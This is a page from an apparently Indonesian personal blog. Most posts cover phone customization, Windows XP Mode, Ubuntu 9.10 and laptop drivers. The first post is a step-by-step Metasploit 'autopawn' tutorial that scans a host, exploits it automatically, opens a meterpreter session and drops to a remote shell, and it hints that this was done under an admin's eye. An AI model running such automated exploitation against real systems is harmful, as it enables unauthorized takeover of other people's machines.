Metasploit Autopawn using PostGreSQL


Akhirnya ane menulis lagi bro..kali ini gw mau bahas mengenai Metasploit Autopawn, dimana kita dapat melakukan exploitasi pada suatu hosts secara otomatis. Dibanding metasploit yang manual mungkin ini terlihat lebih gampang dalam melakukan eksekusi. okeh deh langsung saja.

1. Install Ruby

sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby

sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems

2. Install PostGreSQL

sudo apt-get install postgresql postgresql-client postgresql-contrib
sudo apt-get install pgadmin3

3. Setup the password for postgres

sudo su postgres -c psql

Maka akan keluar seperti ini :
danphi@d4nph1:~$ sudo su postgres -c psql
psql (8.4.5)
Type “help” for help.

postgres=#

Kemudian ketikkan :
ALTER USER postgres WITH PASSWORD ‘your password’;
\q –> Untuk Keluar

Kemudian ketikkan :
danphi@d4nph1:~$ sudo passwd -d postgres
danphi@d4nph1:~$ sudo su postgres -c passwd

Masukkan Password sesuai dengan yang tadi diisikan di ‘your password’

4. Install ActiveRecord dan PostGreSQL Driver

sudo gem1.8 install activerecord
sudo gem1.8 install postgres

Jika kamu tidak bisa menginstall postgres, mungkin kamu harus menginstall ruby1.8-dev
sudo apt-get install ruby1.8-dev

Jika kamu masih tidak bisa menginstall postgres, mungkin kamu membutuhkan libpq-dev
sudo apt-get install libpq-dev

Jika sudah, sekarang silahkan jalankan lagi :
sudo gem1.8 install postgres

5. Download Unix Tarball untuk metasploitnya dari website metasploit dan silahkan kamu extract.

6. Masuk sebagai root dengan mengetikkan ‘su’ dan password root kamu.

7. masuk ke direktori hasil extract dari metasploit yang telah kita extract tadi dan ketikkan :

su postgres
Masukkan password postgres

8. sekarang saatnya untuk jalankan Metasploit kamu :

./msfconsole
msf>

9. Silahkan kamu cek db_driver yang ada dalam hal ini postgres dengan mengetikkan ‘db_driver’ :

msf> db_status
msf> db_driver

karena kita menggunakan postgres maka pilhlah db_driver postgres :
msf> db_driver postgresql

Kemudian kita buat database dengan nama ‘metasploit’ dan langsung kita koneksikan dengan postgres-nya :
msf> db_connect postgres:passwordpostgres@localhost/metasploit

Isikan passwordpostgres dengan password yang tadi telah dibuat kemudian ‘metasploit’ adalah nama databasenya
Setelah itu silahkan di cek lagi dengan menggunakan ‘db_status’ :
msf > db_status
[*] postgresql connected to metasploit

10. Setelah terkoneksi, kamu sudah dapat menjalankan autopawn, berikut langkah-langkah autopawn :

msf > db_nmap 192.168.12.212 –> Untuk melakukan Scanning
msf > db_host –> cek IP yang telah terscan
msf > db_vulns –> untuk mengecek apakah ada vulnerability yang ada di host
msf > db_autopawn –> Untuk mengexploitasi IP yang ada di db_host berdasarkan port dan vulnerability yang ada

Jika anda berhasil mengexploitasi maka akan ada session yang active :
Active sessions
===============
Id  Type         Information                    Connection
—  —-         ———–                    ———-
1   meterpreter  SVR-WEBFILTER01\testing @ TEST-DESKTOP  192.168.12.212:4444 -> 192.168.1.65:1386

Kemudian ketikkan ‘session -i 1‘ :
[*] Starting interaction with 1…
meterpreter >

Untuk masuk ke shell hosts yg telah berhasil di exploit ketikkan ‘shell’ :
meterpreter > shell

Maka kamu pun telah berhasil meng-take over komputer host melalui command prompt…🙂

Udah dulu deh iseng-isengnya, diliatin adminnya soalnya.. 

Customize Android Like Iphone


Allo semua..

Waah,dah lama neh ane gak pernah posting di blog ndiri..mohon maaf bagi para pengunjung blog ane, klo ane kagak pernah update neh blog..Kali ini gw mau share mengenai gadget yg lagi trend akhir2 ini yaitu Android. Alhamdulillah setelah nabung hampir 8 bulan, ane dapet jg neh gadget Android. Yang ane punya adalah Samsung Galaxy Spica. Waktu pertama kali beli OS android ane masih 1.5. Tp skrg udah ane upgrade jadi Eclair 2.1.

Berikut adalah cuztomization dari Android ane :

  1. Firmware : i570EXXJD1
  2. Build Number : SamdroidMod 1.0.2
  3. Kernel : 2.6.29

Okeh langsung aja ane tampilin Screenshoot Android Ane yg udah ane customize :

Nah ntu dy cuplikan screenshot dari Android ane..gimana?? Mantab kan??

Kalo Android ente pingin jadi kayak android ane yg harus ente ngerti adalah :

  1. Upgrade Flashing Android
  2. Upgrade kernel Android
  3. Customize home
  4. Dan Berdoa biar gak masuk service center

Berikut adalah link yg mungkin dapat ente jadikan refrensi, silahkan aja nimbrung disitu :

http://forum.samdroid.net

XPM is the new feature in Windows 7


Allo bro..

Akhirnya gw dapat juga menikmati windus 7 yg ktanya tersohor ntu..Setelah gw cobain kok ada beberapa aplikasi yg gak bisa jalan di windus 7,padahal biasanya di windus XP jalan..langsung aja deh gw tanyain mbah google..:D
Setalah melakukan googling ternyata ada fitur baru di windus 7 yg dapat digunakan agar kita dapat menjalankan aplikasi yg ada di XP..Fitur baru tersebut dinamakan Windows XP Mode

Windows XP Mode ini merupakan salah satu solusi Microsoft untuk masalah kompatibilitas Software dimana dengan menggunakan XPM ini maka pengguna masih dapat menjalankan aplikasi-aplikasi lamanya pada Windows 7.

XPM ini bekerja dengan memanfaatkan teknologi virtualisasi dengan bantuan Windows Virtual PC. Kemudian apa keuntungannya ??
Keuntungan utamanya adalah apa yang dinamakan dengan Seamless Applications, yaitu pengguna dapat menjalankan aplikasi-aplikasi yang terdapat dalam XPM langsung dari desktop Windows 7, seolah-olah aplikasi tersebut memang diinstall pada Windows 7 itu sendiri. Hal ini mungkin mirip dengan parallel desktop yg ada di macOSX. Keuntungan lainnya adalah mudahnya berbagi resources, maksudnya hardware yg terdeteksi di Windows 7 juga akan terdetek di XPM.

Mungkin Untuk lebih jelasnya dapat dilihat screen shotnya😀

Naaah..itu dia tuh XPM..Jadi yg kita install di dalam XPM, itu sama artinya bahwa kita menginstall aplikasi di dalam Windus7 dan dapat langsung dijalankan peraplikasi..:D

Oiya ada satu hal yang patut diperhatikan yaitu mengenai hardware yg digunakan adalah hardware yg support dengan Virtualization..cara mengaktifkannya adalah lewat BIOS..:D

Okeh Kalo gitu selamat mencoba yaak..:D

Hack GDM login Scren Karmic Koala..


Hello Frenz..

If you hated the new login screen and wanted to change it follow these steps :

1. Logout of your current session and return to the GDM
2. Switch to the tty command line prompt using Ctrl-Alt-F1
3. Login using your normal login/password
4. at the command line prompt type: export DISPLAY=:0.0
5. then type: sudo -u gdm gnome-control-center
6. Switch back to the gdm screen using ALT-F7
7. The gnome-control-center should be loaded. Use it to configure your GDM.
8. Click on the Appearances icon, in appearances you can change your GDM’s font, theme and background image.
9. Close the gnome-control-center and login normally.

Okey This tutorial to change the GDM login screen in Ubuntu (9.10) Karmic koala..:D

UbunTu 9.10 KarmiC KoalA ReleaSe..


Allo frenz..

Setelah menunggu sekian lama akhirnya release juga neh si Karmic Koala..hehe. Begitu muncul pada hari H-nya gw langsung dunlud tuh dari http://www.ubuntu.com… Setelah dunlud langsung burning dan langsung tancap gas buat di install di laptop..:D. langsung aja deh berikut daftar fitur baru yg aq sadur dari http://www.ugos.ugm.ac.id di Karmic Koala :

Artwork: Bootscreen baru, Themes, Wallpapers dan Icon banyak lagi

xsplash-33

Capture

Email dan chat
Chat dengan teman dan kolega kamu melalui Empathy dimana terintegrasi dengan : Yahoo, Gmail, MSN, Jabber, AOL, QQ dan banyak lagi. Evolution memberikan email kamu, dan buku alamat dan kalender bekerja dan bekerja dengan baik dengan kolega dan teman menggunakan MS Outlook.

ubuntu-910-email-and-chat

Browsing Internet
Ubuntu menyertakan Mozilla Firefox 3.5 untuk browsing lebih cepat dan lebih aman. Untuk pilihan lain sumber terbuka kunjungi web browser Software Centre dan pilihlah.

ubuntu-910-browser-internet

Photos
Upload dari kamera atau handphone kamu ke F-Spot. Mengelola, tag, berbagi dan menyusun foto. Upload dengan mudah untuk jaringan sosial favorit kamu atau situs berbagi foto termasuk : Flickr, Facebook, Picassa dan banyak lainnya.

ubuntu-910-manage-photos

Music dan video
Colokkan PSP, iPod, MP3 player dan menggunakan Rythmbox untuk men-download, menyimpan, membeli dan memutar musik. Berbagi playlist dengan teman kamu. Last.fm akses langsung melalui Rythmbox untuk melakukan streaming musik favorit kamu. Stream dan memutar video dari YouTube, BBC dan lain-lain.

ubuntu-910-music-videos

Aplikasi Office
Membuat dokumen profesional, spreadsheet dan presentasi dengan OpenOffice.org 3.0. OpenOffice.org kompatibel dengan semua aplikasi office termasuk Microsoft Office. Perbedaan yang paling besar adalah bahwa OpenOffice.org bersifat gratis.

ubuntu-910-office

Play games
Lebih dari 400 permainan yang benar-benar bebas dan benar-benar keren. Solitaire bukanlah satu-satunya permainan. Kunjungi Software Centre untuk dengan mudah mencari, pilih dan menginstal permainan.

ubuntu-910-games

Store, sync and share
Terintegrasi “Ubuntu One” Teknologi ini memberikan anda 2 GB penyimpanan online secara gratis. Mudah berbagi file antara kamu sendiri dan komputer teman-teman kamu. Upgrade dengan biaya rendah untuk kapasitas penyimpanan yang lebih jika kamu membutuhkannya.

ubuntu-910-share-files

Software Center
Akses cepat ke ribuan software gratis open source termasuk aplikasi dengan kategori: Pendidikan, Permainan, Sound dan Video, Grafis, Pemrograman dan Office. Cukup pilih aplikasi yang ingin kamu gunakan dan Software Center akan menambahkannya ke komputer kamu. Tidak ada CD, tidak ada licensi, dan tidak ada kerumitan.

ubuntu-910-software-center

Accessibility
Pada inti dari filosofi Ubuntu adalah keyakinan bahwa komputasi adalah untuk semua orang dan apa pun keadaan kamu. Ubuntu adalah salah satu sistem operasi yang dapat diakses di seluruh dan sepenuhnya diterjemahkan dalam 23 bahasa dengan lebih banyak lagi untuk mengikuti.

ubuntu-910-accessibility

Nah, itu merupaka fitur-fitur baru dari Karmic Koala yg telah aq coba juga di laptop aq..:D

Oiya bagi temen-temen yg membutuhkan link repository lokal, aq menggunakan ini untuk Karmic Koala aq :

deb http://dl2.foss-id.web.id/ubuntu/ karmic multiverse
deb http://dl2.foss-id.web.id/ubuntu/ karmic-updates multiverse
deb http://dl2.foss-id.web.id/ubuntu/ karmic-security multiverse
deb http://dl2.foss-id.web.id/ubuntu/ karmic-backports main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu karmic-proposed main restricted universe multiverse

Selamat Mencoba Karmic Koala..horee

Referensi :
http://www.omgubuntu.co.uk/2009/10/ubuntu-910-review-karmic.html
http://www.ubuntu.com/products/whatisubuntu/910features/
http://www.ugos.ugm.ac.id/main/2009/10/30/ubuntu-9-10-karmic-koala-release/

Customize Symbian UIQ3 in My Phone..


Allo Bro..

Akhirnya gw keturutan jg punya W950i, Meskipun gw dapetnya second,tp gw suka bgt ma ne Gadget..hehehe. Gw mau utak-atik neh Hape, tp ternyata gak semudah yg gw byangin, gw ternyata harus nglakuin hacking terhadap hape gw supaya bisa di cuztomize..W950i mempunyai OS yaitu Symbian dengan Type UIQ3..Berikut adalah step-step Hacking UIQ3 : (yg menggunakan UIQ3 : w950,w960,P990,P1,G700,G900,M600..)

1. Pertama Installah CAPS SWITCH, jalankan caps switch dan ubah modenya menjadi OFF

Kamu dapat  unduh CAPS SWITCH disini

2. Install X-Plore atau Swiss Manager untuk mengcopy File

Kamu dapat unduh X-Plore disini

3. Install SIS installerMOD dan kemudian reboot Hape Kamu

Kamu dapat unduh SISinstaller disini

4. Untuk Hacking screen, km bisa menggunakan MagicScreen, ini digunakan untuk menempatkan aplikasi-aplikasi yg kamu inginkan di desktop hape km.

Kamu bisa unduh MagicScreen dengan RegCode 30300 disini

Berikut ScreenShot2nya..

Magic Screen dan Hasil custom :

23511668268 1205753988

Okeh bro segitu dulu yak,yg bisa ane share, UIQ3 kamu dah siap di custom…hehehe.Maklum baru punya hape yg rada canggih dikit..horee

Update Driver Toshiba L510


Allo bro…

Menanggapi komen temen-temen mengenai driver Toshiba L510, saya mencoba untuk melengkapi driver tersebut dengan driver2 pendukung seperti hotkey, common module, dan web camera… Berikut adalh driver-driver yg mungkin temen-temen bisa unduh :

1. Hotkey Utility (ini biasanya untuk tombol Fn) bisa diambil disini

2. Common Module (ini diinstall sebelum hotkey) bisa diambil disini

3. Web Camera (ini bagi yg belum kedetek web cameranya) bisa diambil disini

4. Bluetooth (ini blom gw coba..hehe) bisa diambil disini

5. Sond Card bisa diambil disini

Nah, ntu dulu updatean driver yg mngkin temen-temen butuhin..semoga bermanfaat..hehe2